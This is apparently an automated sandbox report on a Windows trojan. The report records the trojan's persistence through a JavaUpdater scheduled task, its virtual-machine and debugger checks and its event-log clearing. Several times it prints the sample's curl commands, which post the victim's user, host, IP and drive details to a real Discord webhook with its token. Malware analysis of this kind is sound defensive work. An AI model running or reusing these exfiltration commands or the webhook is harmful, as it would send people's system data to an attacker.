Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s https://api.ipify.org
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess created: C:\Windows\System32\curl.exe curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:25.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm
Source: unknownProcess created: C:\Users\user\AppData\Local\java.exe C:\Users\user\AppData\Local\java.exe
Source: C:\Users\user\AppData\Local\java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\java.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s https://api.ipify.org
Source: C:\Users\user\AppData\Local\java.exeProcess created: C:\Windows\System32\curl.exe curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:27.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.orgJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess created: C:\Windows\System32\curl.exe curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:25.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhmJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s https://api.ipify.orgJump to behavior
Source: C:\Users\user\AppData\Local\java.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.orgJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Section loaded: apphelp.dll, msvcp140.dll, vcruntime140_1.dll, vcruntime140.dll, uxtheme.dll, windows.storage.dll, wldp.dll, ntmarta.dll, kernel.appcore.dll, taskschd.dll, sspicli.dll, xmllite.dll
Source: C:\Windows\System32\curl.exe Section loaded (list repeated four times): secur32.dll, sspicli.dll, iphlpapi.dll, mswsock.dll, kernel.appcore.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
Source: C:\Users\user\AppData\Local\java.exe Section loaded: apphelp.dll, msvcp140.dll, vcruntime140_1.dll, vcruntime140.dll, uxtheme.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, taskschd.dll, sspicli.dll
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Jx6bD8nM4qW9sL3v.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: Jx6bD8nM4qW9sL3v.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Jx6bD8nM4qW9sL3v.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Jx6bD8nM4qW9sL3v.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Jx6bD8nM4qW9sL3v.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Jx6bD8nM4qW9sL3v.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Jx6bD8nM4qW9sL3v.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Jx6bD8nM4qW9sL3v.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Jx6bD8nM4qW9sL3v.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Jx6bD8nM4qW9sL3v.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Jx6bD8nM4qW9sL3v.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Jx6bD8nM4qW9sL3v.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Jx6bD8nM4qW9sL3v.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Code function: 0_2_00007FF670FC3FEA LoadLibraryA,GetProcAddress,FreeLibrary,GetCurrentProcess,NtQueryInformationProcess,FreeLibrary,0_2_00007FF670FC3FEA
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe File created: C:\Users\user\AppData\Local\java.exe (dropped file)
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Code function: 0_2_00007FF670FC42B0 RtlAdjustPrivilege,NtRaiseHardError,GetConsoleWindow,ShowWindow,SetConsoleCtrlHandler,GetConsoleWindow,GetSystemMenu,RemoveMenu,GetModuleFileNameW,GetFileAttributesW,SetFileAttributesW,GdiplusStartup,CoUninitialize,OpenEventLogW,ClearEventLogW,CloseEventLog,_invalid_parameter_noinfo_noreturn,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,0_2_00007FF670FC42B0

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Code function: VBox VBox VMware QEMU QEMU 0_2_00007FF670FC3EC9
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Code function: VMware QEMU QEMU 0_2_00007FF670FC4082
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Code function: VMware QEMU QEMU 0_2_00007FF670FC40AC
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Code function: VMware QEMU QEMU 0_2_00007FF670FC4130
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Code function: VMware QEMU QEMU 0_2_00007FF670FC3F89
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Code function: VBox VBox VMware QEMU QEMU 0_2_00007FF670FC3FEA
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Code function: VMware VBox QEMU QEMU 0_2_00007FF670FC3E00
Source: C:\Users\user\AppData\Local\java.exe Code function: VMware QEMU QEMU 6_2_00007FF65E1F3F89
Source: C:\Users\user\AppData\Local\java.exe Code function: VBox VBox VMware QEMU QEMU 6_2_00007FF65E1F3FEA
Source: C:\Users\user\AppData\Local\java.exe Code function: VMware QEMU QEMU 6_2_00007FF65E1F40AC
Source: C:\Users\user\AppData\Local\java.exe Code function: VMware QEMU QEMU 6_2_00007FF65E1F4082
Source: C:\Users\user\AppData\Local\java.exe Code function: VMware QEMU QEMU 6_2_00007FF65E1F4130
Source: C:\Users\user\AppData\Local\java.exe Code function: VBox VBox VMware QEMU QEMU 6_2_00007FF65E1F3EC9
Source: C:\Users\user\AppData\Local\java.exe Code function: VMware VBox QEMU QEMU 6_2_00007FF65E1F3E00
Source: Jx6bD8nM4qW9sL3v.exe, java.exe Binary or memory string: OLLYDBG.EXE
Source: Jx6bD8nM4qW9sL3v.exe, java.exe Binary or memory string: X64DBG.EXE
Source: java.exe.0.drBinary or memory string: SECURITY CHECK FAILED!\JAVA.EXEJAVAUPDATER\JAVA PLATFORM SEAPPLICATIONSYSTEMSECURITYNTDLL.DLLNTQUERYINFORMATIONPROCESSOLLYDBG.EXEX64DBG.EXEX32DBG.EXEIDA64.EXEIDA.EXECHEATENGINE-X86_64.EXESYSTEM\CURRENTCONTROLSET\CONTROL\CI\POLICYDEBUGPOLICYVMWAREVBOXQEMUVIRTUALSYSTEM\HARDWARECONFIG\CURRENT\SYSTEMMANUFACTURERBAD CASTFALSETRUEMAP/SET TOO LONG] [JSON.EXCEPTION.FAILED TO CALCULATE DECODED SIZEFAILED TO DECODE BASE64 STRINGCREATEPIPE FAILEDCREATEPROCESS FAILEDCOLORTIMESTAMPFIELDSFOOTERTEXTNAMEVALUEINLINEIMAGEURLEMBEDS%Y-%M-%DT%H:%M:%S.000Z\"\\" CURL -H "CONTENT-TYPE: APPLICATION/JSON" -X POST -D "WEBHOOK SENT. RESPONSE: ERROR SENDING WEBHOOK: AHR0CHM6LY9KAXNJB3JKLMNVBS9HCGKVD2VIAG9VA3MVMTMYMTMYODYWMJC5MJQ2MDMZMC9ROUNRTVVXAFBTBKXBOFLDR0ZPV2NOMXFZBWQ4U3PFEKHWNVJJRNJJDVL4OFVXVTJIU0CZZMR3NGDYMUM3QVZOSLFOBQ==LOCAL USERSYSTEM NAMEIP ADDRESSSERIAL NUMBERPRODUCT VERSIONDRIVESNEW CLIENTCANNOT USE OPERATOR[] WITH A NUMERIC ARGUMENT WITH {}{
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Code function: 0_2_00007FF670FC1780 GetLogicalDriveStringsA,memset,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ,GetDriveTypeA,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF670FC1780
Source: java.exe.0.dr Binary or memory string: VMware
Source: java.exe.0.drBinary or memory string: Security check failed!\java.exeJavaUpdater\Java Platform SEApplicationSystemSecurityntdll.dllNtQueryInformationProcessollydbg.exex64dbg.exex32dbg.exeida64.exeida.execheatengine-x86_64.exeSYSTEM\CurrentControlSet\Control\CI\PolicyDebugPolicyVMwareVBoxQEMUVirtualSYSTEM\HardwareConfig\Current\SystemManufacturerbad castfalsetruemap/set too long] [json.exception.Failed to calculate decoded sizeFailed to decode base64 stringCreatePipe failedCreateProcess failedcolortimestampfieldsfootertextnamevalueinlineimageurlembeds%Y-%m-%dT%H:%M:%S.000Z\"\\" curl -H "Content-Type: application/json" -X POST -d "Webhook sent. Response: Error sending webhook: aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTMyMTMyODYwMjc5MjQ2MDMzMC9ROUNRTVVxaFBtbkxBOFlDR0ZpV2NOMXFzbWQ4U3pFekhWNVJjRnJJdVl4OFVXVTJiU0czZmR3NGdyMUM3QVZoSlFobQ==local usersystem nameip addressserial numberproduct versionDrivesNew clientcannot use operator[] with a numeric argument with {}{
Source: curl.exe, 00000003.00000003.2025355988.0000018EE9645000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.2033480984.0000015BFD285000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2051214870.000002C6CC524000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.2059556756.00000269500F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Code function: 0_2_00007FF670FC4082 GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_00007FF670FC4082
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\java.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Code function: 0_2_00007FF670FCE324 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF670FCE324
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Code function: 0_2_00007FF670FC3FEA LoadLibraryA,GetProcAddress,FreeLibrary,GetCurrentProcess,NtQueryInformationProcess,FreeLibrary,0_2_00007FF670FC3FEA
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Code function: 0_2_00007FF670FCE050 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF670FCE050
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Code function: 0_2_00007FF670FCE4C8 SetUnhandledExceptionFilter,0_2_00007FF670FCE4C8
Source: C:\Users\user\AppData\Local\java.exe Code function: 6_2_00007FF65E1FE050 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF65E1FE050
Source: C:\Users\user\AppData\Local\java.exe Code function: 6_2_00007FF65E1FE4C8 SetUnhandledExceptionFilter,6_2_00007FF65E1FE4C8
Source: C:\Users\user\AppData\Local\java.exe Code function: 6_2_00007FF65E1FE324 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF65E1FE324
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Process created: C:\Windows\System32\curl.exe curl -h "content-type: application/json" -x post -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"c6553afb\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"windows 6.2 (build 9200)\"},{\"inline\":false,\"name\":\"drives\",\"value\":\"c: (local) d: (cd-rom)\"}],\"footer\":{\"text\":\"new client\"},\"timestamp\":\"2024-12-30t11:32:25.000z\"}]}" https://discord.com/api/webhooks/1321328602792460330/q9cqmuqhpmnla8ycgfiwcn1qsmd8szezhv5rcfriuyx8uwu2bsg3fdw4gr1c7avhjqhm
Source: C:\Users\user\AppData\Local\java.exe Process created: C:\Windows\System32\curl.exe curl -h "content-type: application/json" -x post -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"c6553afb\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"windows 6.2 (build 9200)\"},{\"inline\":false,\"name\":\"drives\",\"value\":\"c: (local) d: (cd-rom)\"}],\"footer\":{\"text\":\"new client\"},\"timestamp\":\"2024-12-30t11:32:27.000z\"}]}" https://discord.com/api/webhooks/1321328602792460330/q9cqmuqhpmnla8ycgfiwcn1qsmd8szezhv5rcfriuyx8uwu2bsg3fdw4gr1c7avhjqhm
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\java.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Code function: 0_2_00007FF670FCE20C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF670FCE20C
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe Code function: 0_2_00007FF670FC7E10 GetUserNameW,GetComputerNameW,GetVolumeInformationW,memset,GetVersionExW,GetModuleHandleW,GetProcAddress,_invalid_parameter_noinfo_noreturn,0_2_00007FF670FC7E10
Source: Jx6bD8nM4qW9sL3v.exe, java.exe Binary or memory string: ollydbg.exe
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (1) | Scheduled Task/Job (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Encrypted Channel (21) | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job (1) | DLL Side-Loading (1) | Scheduled Task/Job (1) | Virtualization/Sandbox Evasion (11) | LSASS Memory | Security Software Discovery (431) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | Native API (1) | Logon Script (Windows) | DLL Side-Loading (1) | Process Injection (11) | Security Account Manager | Virtualization/Sandbox Evasion (11) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Exploitation for Client Execution (1) | Login Hook | Login Hook | Indicator Removal (1) | NTDS | Process Discovery (2) | Distributed Component Object Model | Input Capture | Application Layer Protocol (4) | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | DLL Side-Loading (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | System Network Configuration Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery (1) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | System Information Discovery (13) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
[Behavior graph. Behavior Graph ID: 1582327; Sample: Jx6bD8nM4qW9sL3v.exe; Startdate: 30/12/2024; Architecture: WINDOWS; Score: 76]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| Jx6bD8nM4qW9sL3v.exe | 47% | ReversingLabs | Win64.Trojan.Generic | |
| Jx6bD8nM4qW9sL3v.exe | 54% | Virustotal | | Browse |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\java.exe | 47% | ReversingLabs | Win64.Trojan.Generic | |

No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| https://api.ipify.org~ | 0% | Avira URL Cloud | safe | |
| https://api.ipify.org2 | 0% | Avira URL Cloud | safe | |
| http://crl.se1 | 0% | Avira URL Cloud | safe | |
| https://api.ipify.org9 | 0% | Avira URL Cloud | safe | |
| https://api.ipify.orgL | 0% | Avira URL Cloud | safe | |
| https://api.ipify.orgWinsta0 | 0% | Avira URL Cloud | safe | |
| https://api.ipify.orgcurl | 0% | Avira URL Cloud | safe | |
| https://api.ipify.org7 | 0% | Avira URL Cloud | safe | |
| https://api.ipify.orgvB | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| discord.com | 162.159.128.233 | true | false | | high |
| api.ipify.org | 104.26.12.205 | true | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://api.ipify.org/ | false | | high |
| https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm | false | | high |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU | curl.exe, 0000000A.00000002.2059832303.00000269500E8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://sectigo.com/CPS0 | Jx6bD8nM4qW9sL3v.exe, java.exe.0.dr | false | | high |
| http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0# | Jx6bD8nM4qW9sL3v.exe, java.exe.0.dr | false | | high |
| https://api.ipify.orgcurl | Jx6bD8nM4qW9sL3v.exe, java.exe.0.dr | false | Avira URL Cloud: safe | unknown |
| http://ocsp.sectigo.com0 | Jx6bD8nM4qW9sL3v.exe, java.exe.0.dr | false | | high |
| https://api.ipify.org7 | curl.exe, 00000003.00000002.2025529355.0000018EE9648000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2025355988.0000018EE9645000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://api.ipify.org2 | java.exe, 00000006.00000002.2060240613.0000022751ECB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://api.ipify.org? | curl.exe, 00000003.00000002.2025529355.0000018EE9648000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2025355988.0000018EE9645000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://api.ipify.orgWinsta0 | curl.exe, 00000003.00000002.2025529355.0000018EE9630000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://api.ipify.org~ | java.exe, 00000006.00000002.2060240613.0000022751EEB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://api.ipify.org9 | Jx6bD8nM4qW9sL3v.exe, 00000000.00000002.2034490132.000002597BC07000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://crl.se1 | Jx6bD8nM4qW9sL3v.exe, 00000000.00000003.2018730241.000002597BC1B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://crl.sectigo.com/SectigoPublicTime | Jx6bD8nM4qW9sL3v.exe, 00000000.00000003.2018730241.000002597BC1B000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0 | Jx6bD8nM4qW9sL3v.exe, java.exe.0.dr | false | | high |
| https://api.ipify.org | curl.exe, 00000009.00000002.2051339309.000002C6CC54A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.2051301631.000002C6CC510000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2051239188.000002C6CC527000.00000004.00000020.00020000.00000000.sdmp, Jx6bD8nM4qW9sL3v.exe, java.exe.0.dr | false | | high |
| https://api.ipify.orgL | curl.exe, 00000009.00000002.2051301631.000002C6CC510000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://discord.com/api/webhooK | curl.exe, 00000005.00000002.2033796989.0000015BFD279000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.2059642518.00000269500F2000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z | Jx6bD8nM4qW9sL3v.exe, java.exe.0.dr | false | | high |
| https://api.ipify.org/Item | curl.exe, 00000003.00000002.2025529355.0000018EE9637000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://api.ipify.orgvB | curl.exe, 00000009.00000003.2051214870.000002C6CC524000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.2051327029.000002C6CC528000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2051239188.000002C6CC527000.00000004.00000020.00020000.00000000.sdmp | false |
                                • Avira URL Cloud: safe
                                unknown
                                http://crt.sectigo.com/SectigoPublicTimeStampingRootIJx6bD8nM4qW9sL3v.exe, 00000000.00000002.2034490132.000002597BC07000.00000004.00000020.00020000.00000000.sdmp, Jx6bD8nM4qW9sL3v.exe, 00000000.00000003.2018730241.000002597BC1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#Jx6bD8nM4qW9sL3v.exe, java.exe.0.drfalse
                                    high
                                    https://api.ipify.orgwinsta0curl.exe, 00000009.00000002.2051301631.000002C6CC510000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
162.159.128.233 | discord.com | United States | 13335 | CLOUDFLARENETUS | false
IP
127.0.0.1
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1582327
                                      Start date and time:2024-12-30 11:13:05 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 4m 54s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:13
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Jx6bD8nM4qW9sL3v.exe
                                      Detection:MAL
                                      Classification:mal76.expl.evad.winEXE@16/4@2/3
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 38
                                      • Number of non-executed functions: 68
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
Time | Type | Description
11:13:54 | Task Scheduler | Run new task: JavaUpdater path: C:\Users\user\AppData\Local\java.exe
